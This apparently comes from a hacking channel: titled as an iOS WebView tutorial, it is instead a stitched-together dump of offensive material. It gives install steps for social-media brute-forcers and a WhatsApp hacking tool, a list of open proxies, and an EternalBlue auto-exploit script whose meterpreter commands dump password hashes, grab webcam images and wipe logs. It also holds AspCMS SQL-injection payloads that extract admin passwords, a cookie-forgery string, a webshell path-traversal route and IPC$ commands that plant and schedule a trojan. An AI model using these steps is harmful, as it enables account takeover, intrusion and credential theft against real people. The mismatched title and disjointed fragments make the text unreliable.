🦑Introduction to the basic usage of WebView in iOS development
by iUndercode Team, no video for this one > hard
anyway will upload some videos later

> i used on baidu browser, you can use on google chrome

🦑expert ios -tips @iUndercode

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁▁

🦑hack Facebook , Gmail , Instagram ,Twitter ,

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

1) sudo apt-get install git

2) git clone https://github.com/TunisianEagles/SocialBox.git

3) cd SocialBox

4) chmod +x SocialBox.sh

5) chmod +x install-sb.sh

6) ./install-sb.sh

7) ./SocialBox.sh

8) recommended to used Socks5


🦑OS :

>Backbox linux
>Ubuntu
> Kali linux
> bruteforce on termux takes years to done ..

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁▁

🦑FRESH PREMIUM PROXIES 1 h:


52.221.211.14 80 1 hour ago
1171 ms 81% (72) sg Singapore - Singapore Transparent -
125.163.161.151 8080 1 hour ago
3921 ms 15% (125) id Indonesia - Pekalongan Transparent -
109.168.18.50 8080 1 hour ago
2766 ms 17% (134) it Italy - Misinto Transparent -
103.204.220.21 82 1 hour ago
2881 ms 14% (136) np Nepal Transparent -
60.216.20.211 8001 1 hour ago
3435 ms 5% (154) cn China - Jinan Transparent -
103.111.55.58 173 1 hour ago
3807 ms 3% (162) id Indonesia Transparent -
62.201.217.194 8080 1 hour ago
3731 ms 17% (125) iq Iraq - Sulaymaniyah Transparent -
62.210.58.187 5836 1 hour ago
2731 ms 21% (115) fr France Transparent -
103.52.220.33 82 1 hour ago
1301 ms 8% (150) in India Transparent -
62.210.253.15 5836 1 hour ago
2668 ms 11% (134) fr France Transparent -
103.216.48.83 8080 1 hour ago
3706 ms 22% (114) kh Cambodia - Phnom Penh Transparent -
154.118.128.106 8080 1 hour ago
522 ms 2% (172) ml Mali Transparent -
103.111.55.58 8031 1 hour ago
3753 ms 5% (153) id Indonesia Transparent -
103.10.81.138 80 1 hour ago
3770 ms 20% (112) id Indonesia Transparent -
62.210.58.185 5836 1 hour ago
2819 ms 20% (122) fr France Transparent -
103.28.121.58 3128 1 hour ago
2775 ms 68% (70) bd Bangladesh Anonymous -
121.233.87.68 4216 1 hour ago
5140 ms 15% (128) cn China Elite -
124.156.98.172 443 1 hour ago
2322 ms 35% (100) hk Hong Kong Elite -
212.83.181.166 5836 1 hour ago
3121 ms 20% (120) fr France Transparent -
212.83.183.82 5836 1 hour ago
2989 ms 19% (118) fr France - Boulogne-Billancourt Transparent -
194.44.87.245 8080 1 hour ago
2640 ms 20% (124) ua Ukraine - Manevychi Transparent -
62.118.131.240 3128 1 hour ago
875 ms 12% (152) ru Russia - Veliky Novgorod Elite -
54.169.9.36 3128 1 hour ago
3984 ms 9% (147) sg Singapore - Singapore Anonymous -
209.91.216.167 8080 1 hour ago
3021 ms 22% (110) pr Puerto Rico - San Juan Transparent -
61.240.222.27 3128 1 hour ago
1170 ms 65% (76) cn China Transparent -
52.221.60.138 80 1 hour ago
1280 ms 80% (70) sg Singapore Transparent -
46.52.214.216 8080 1 hour ago
3685 ms 12% (138) ru Russia Transparent -
36.67.230.250 3128 1 hour ago
3293 ms 12% (113) id Indonesia Transparent -
41.65.201.182 8080 1 hour ago
2689 ms 20% (128) eg Egypt Transparent -
49.156.44.138 8080 1 hour ago
3533 ms 19% (126) kh Cambodia - Phnom Penh Transparent -
41.65.201.168 8080 1 hour ago
3429 ms 10% (143) eg Egypt Transparent -
61.194.237.25 8080 1 hour ago
2043 ms 10% (137) jp Japan - Yokohama Transparent -
31.28.228.252 8080 1 hour ago
3754 ms 21% (117) ua Ukraine - Sevastopol Elite -
51.91.212.159 3128 1 hour ago
706 ms 82% (66) fr France Transparent -
51.89.226.241 9999 1 hour ago
743 ms 98% (96) gb United Kingdom Anonymous -

@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁▁

🦑 PLEASE NOTE WHEN USING PROXIES OR VPN OR VM OR ANY OTHER TIPS SENDED HERE :

> Nothing anonymous 100%
> .onion also targeted by gov..
> VM> all include vulnerabilities for tracking
> no vpn trusted 100% safe, when isp comes they have permission to get all vpn data from their company provider legally
>if you not sure, check the investigations on wiki😃, or ask bad hackers in jail

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁▁

🦑Somehow automated eternalblue scanner & exploiter script using metasploit and eternalscanner> BY NSA⭐️


🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :


1) git clone git@github.com:nsa/eternalblue-scanner.git && cd

2) eternalblue-scanner

3) chmod +x eternalbash

4) sudo bash eternalbash

🦑If any sessions were opened this scripts automatically runs the following meterpreter commands from the assets/nsa.rc file. If you don't want to use following commands, you can just simply change the commands from that nsa.rc file.

hashdump
screenshot
webcansnap -v false
clearev
background

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁▁

🦑These are the ten main network password cracking methods summarized by undercode :

🦑𝕃𝔼𝕋'𝕊 𝕊𝕋𝔸ℝ𝕋::

1. Brute force


The most basic of password cracking techniques is brute force cracking, also called password exhaustion. If the hacker knows the account number in advance, such as mail account, QQ user account, online banking account, etc., and the user's password is set very simple, such as using a simple combination of numbers, the hacker can quickly crack the password using a brute force tool Come. Therefore, users should try to make the password setting more complicated.


2. Keystroke record


If the user's password is more complicated, it is difficult to use brute force to crack. At this time, hackers often install a Trojan horse virus to the user, design a "keystroke recording" program, record and monitor the user's keystroke operations, and then through various methods. The recorded user keystroke content is transmitted to the hacker, so that the hacker can crack the user's password by analyzing the user keystroke information.


3. Screen recording


In order to prevent the keystroke recording tool, there is a way to enter the password using the mouse and the picture. At this time, the hacker can take a screenshot of the user's screen through the Trojan program and then record the position of the mouse click, and record the position of the mouse to compare the screenshot of the screenshot to crack this type Method user password.


4. Phishing


"Phishing" attacks use fraudulent emails and forged websites to log in to conduct fraudulent activities. The scammers often reveal their sensitive information (such as user name, password, account number, PIN code or credit card details), phishing Mainly by sending e-mails to lure users to log in to fake online banking and online securities websites, to defraud users' account passwords for theft.


5. Sniffer (sniffer)


On a local area network, if a hacker wants to quickly obtain a large number of accounts (including user name and password), the most effective method is to use the Sniffer program. Sniffer, Chinese translation for sniffer, is a very threatening passive attack tool. Using this tool, you can monitor the status of the network, the flow of data, and the information transmitted on the network. When the information is transmitted on the network in the form of plain text, you can use the network monitoring method to steal the transmitted data packets on the network. By setting the network interface in monitoring mode, you can intercept the continuous information transmitted on the Internet. Any data packets directly transmitted through HTTP, FTP, POP, SMTP, TELNET protocols will be monitored by the Sniffer program.


6. Password Reminder


For some local passwords saved in asterisks, you can use tools like Password Reminder to crack them. Drag and drop the magnifying glass in Password Reminder onto the asterisks to crack the password.


7. Remote control


Use the remote control Trojan to monitor all operations of the user's local computer. Any keyboard and mouse operations of the user will be intercepted by the remote hacker.


8. Bad habits


Some employees of the company set a long password, but they wrote the password on paper. Some people used their own names or their birthdays as passwords, and some people used commonly used words as passwords. These bad habits will lead to Passwords can be easily cracked.


9. Analytical reasoning


If a user uses multiple systems, a hacker can first crack the user password of a simpler system, and then use the cracked password to calculate the user password of other systems. For example, many users use the same password for all systems.


10. Password Psychology

🦑These are the ten main network password cracking methods summarized by undercode

Many well-known hackers do not use any cutting-edge technology, but only use the psychology of passwords, starting with the user's psychology, analyzing the user's information from the minute, and analyzing the user's psychology, so as to crack the password faster. In fact, there are many ways to obtain information. If you have a good grasp of cryptographic psychology, you can quickly crack to obtain user information.

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁▁

🦑Aspcms version 0day collection


admin / content / About / AspCmsAboutEdit.asp? id = 19 and 1 = 2 union select 1,2,3,4,5, loginname, 7,8,9, password, 11,12,13,14,15,16 , 17,18,19,20,21,22,23,24 from aspcmsuser where userid = 1

————————————————————————
Unverified permissions, and injection vulnerability
admin / content / About / AspCmsAboutEdit.asp? Id = 19
Table name: aspcmsuser
column name: loginname, password

Use EXP:
admin / content / About / AspCmsAboutEdit.asp? Id = 19 and 1 = 2 union select 1,2,3,4,5, loginname, 7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23, password, 25,26,27,28,29,30,31,32,33,34,35 from aspcmsuser where userid = 1

2.0 Vulnerability Tester: Xiaoyao Revenge (please specify)

—————— Cookies fraud ——————
cookies: username = admin; ASPSESSIONIDAABTAACS = IHDJOJACOPKFEEENHHMJHKLG; LanguageAlias = cn; LanguagePath =% 2F; languageID = 1; adminId = 1; adminName = admin; groupMenu = 1% 2C + 70% 2C + 10% 2C + 11% 2C + 12% 2C + 13% 2C + 14% 2C + 20% 2C + 68% 2C + 15% 2C + 16% 2C + 17% 2C + 18% 2C + 3 % 2C + 25% 2C + 57% 2C + 58% 2C + 59% 2C + 2% 2C + 21% 2C + 22% 2C + 23% 2C + 24% 2C + 4% 2C + 27% 2C + 28% 2C + 29% 2C + 5% 2C + 49% 2C + 52% 2C + 56% 2C + 30% 2C + 51% 2C + 53% 2C + 54% 2C + 55% 2C + 188% 2C + 67% 2C + 63 % 2C + 190% 2C + 184% 2C + 86% 2C + 6% 2C + 32% 2C + 33% 2C + 34% 2C + 8% 2C + 37% 2C + 183% 2C + 38% 2C + 60% 2C +9; GroupName =% B3% AC% BC% B6% B9% DC% C0% ED% D4% B1% D7% E9

isra2eel revenge encountered a station background changed by the administrator, NND. The homepage of the background has not been found for a long time, and finally go to the official down source code to see home.asp (if the version is different, please try main.asp), the tool is: Cookie & Inject Browser

—————— webshell get ————
all The version has a background editing style and can modify any file. Obtaining the webshell is very simple
. Admin / Style / AspCmsTemplateEdit.asp? Acttype = & filename = .. / .. / .. / index.asp

@UNDERCODETesting

▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁▁

Victor CMS 1.0 - Authenticated Arbitrary File Upload
# Google Dork: N/A
Verified by Undercode

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁▁

🦑How to hack into a computer :

1) Trojan horse invasion
Trojan horse may be the most hated thing for the majority of computer enthusiasts, I believe many friends have been harassed by it. The Trojan may be uploaded by a hacker on the premise that the hacker has obtained the write permission of our operating system (for example, the ipc $ shared invasion mentioned below); or it may be that we have browsed some personal websites and browsed through the web Infected (using IE loopholes); of course, the most common situation is that our awareness of prevention is not strong, and we randomly run programs such as mm pictures and beautiful animations sent by others or download them on irregular websites. Software use.
Countermeasure: Increase the awareness of prevention, and do not run the software sent by others at will. Install the Trojan horse killing software and update the Trojan horse feature database in time. Recommend to use the cleaner, wood mark star.

2) ipc $ share invasion

Microsoft set this function in win is almost useless for individual users. Instead, it becomes a convenient channel for hackers to invade the nt architecture operating system. If your operating system has an insecure password, it is even more terrible.

🦑 A typical intrusion process is as follows:
(1) Obtain an account and password (guess, crack) by any method. There is a software called smbcrack circulating online that uses ipc $ to crack the account password. If your password has a low number of digits and is simple, it can be easily cracked. According to my personal experience, quite a lot of people set the administrator password to 123, 2003, or simply do not set a password.

(2) Use the command net use \\ xxx.xxx.xxx.xxx \ ipc $ "password" / user: "user name" to establish an ipc $ connection with certain permissions. Use copy trojan.exe \\ xxx.xxx.xxx.xxx \ admin $ to
copy the server side of the Trojan program to the system directory.

(3) Use the net time \\ xxx.xxx.xxx.xxx command to view the time of the other party's operating system, and then use at \\ 202.xxx.xxx.xxx 12:00 trojan.exe to let trojan.exe run at the specified time.

In this way, your computer is completely controlled by hackers.
Countermeasure: Disable server service, Task Scheduler service, remove the check mark before sharing network files and printers.
Of course, adding a strong password to your account is the most critical.

3) Invasion of iis vulnerability

As broadband is becoming more and more popular, install easy-to-learn iis on your win and build an ftp or web site that is open from time to time. Many people have already done so. But the endless loopholes of iis are really worrying.

> A remote attack can be completed by using the webdavx3 vulnerability attack program and the telnet command to complete a remote attack on IIS, which means that any command executed by the hacker at the moment is running on the compromised machine. If the format command is executed at this time, the harm can be imagined. Adding an account with the net user command is also a breeze.


> Countermeasure: Pay attention to Microsoft's official site and install the iis vulnerability patch in time.

4 ) Web page malicious code intrusion

When we browse the web, we will inevitably encounter some irregular websites. They often modify the registry of the browser without authorization. The direct manifestation is to modify the default homepage of IE, lock the registry, modify the right-click menu, etc. . In fact, most of the malicious code of web pages is achieved by modifying our registry. As long as you protect your registry, everything is ok.

5) Countermeasures: Install protection software with real-time monitoring function of the registry, and do a good job of backing up the registry. Disable the Remote Registry Service service and do not go to some websites that should not be on. Here undercode recommend everyone to use the firewall.


@undercodeTesting
▁▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁▁

🦑This program is just a small program to shorten brute force sessions on hydra > But to be more satisfying results of the brute force. You better interact directly with hydra, without having to use this black hydra console first

> this small tool choosed by toolx team

https://github.com/Gameye98/Black-Hydra

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

simply clone and run as python
> type -h for help

▁▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁▁

1) Install dependencies:
# apt-get update
# apt-get install openjdk-8-jdk
# apt-get install gradle

2) Use Java8:
Get Java8 dir with command:
# update-alternatives --list java

3) Copy and replace dir on command:
# update-alternatives --set java /usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java

4) Download Android Studio:
https://developer.android.com/studio

5) Installing Android Studio:
# unzip ~/Downloads/android. zip -d /opt

6) For AMD64 Arch, Install Android Studio dependencies:
# apt-get install lib32z1 lib32ncurses6 lib32stdc++6


7) Run Android Studio:
# cd /opt/android-studio/bin
# ./studio.sh

8) Go to SDK Manager (Configure -> SDK Manager) and Download:
Android SDK Build-tools, Android SDK-tools, Android SDK platform-tools, Support Repository

9)Run script:
# git clone https://github.com/thelinuxchoice/whatshack
# cd whatshack/
# bash whatshack.sh

10) On First Time, Choose "n" when asks to build, then open the project on Android Studio:
cd /opt/android-studio/bin
./studio.sh

11) Import Gradle Project:
Choose whatshack app folder: whatshack/app/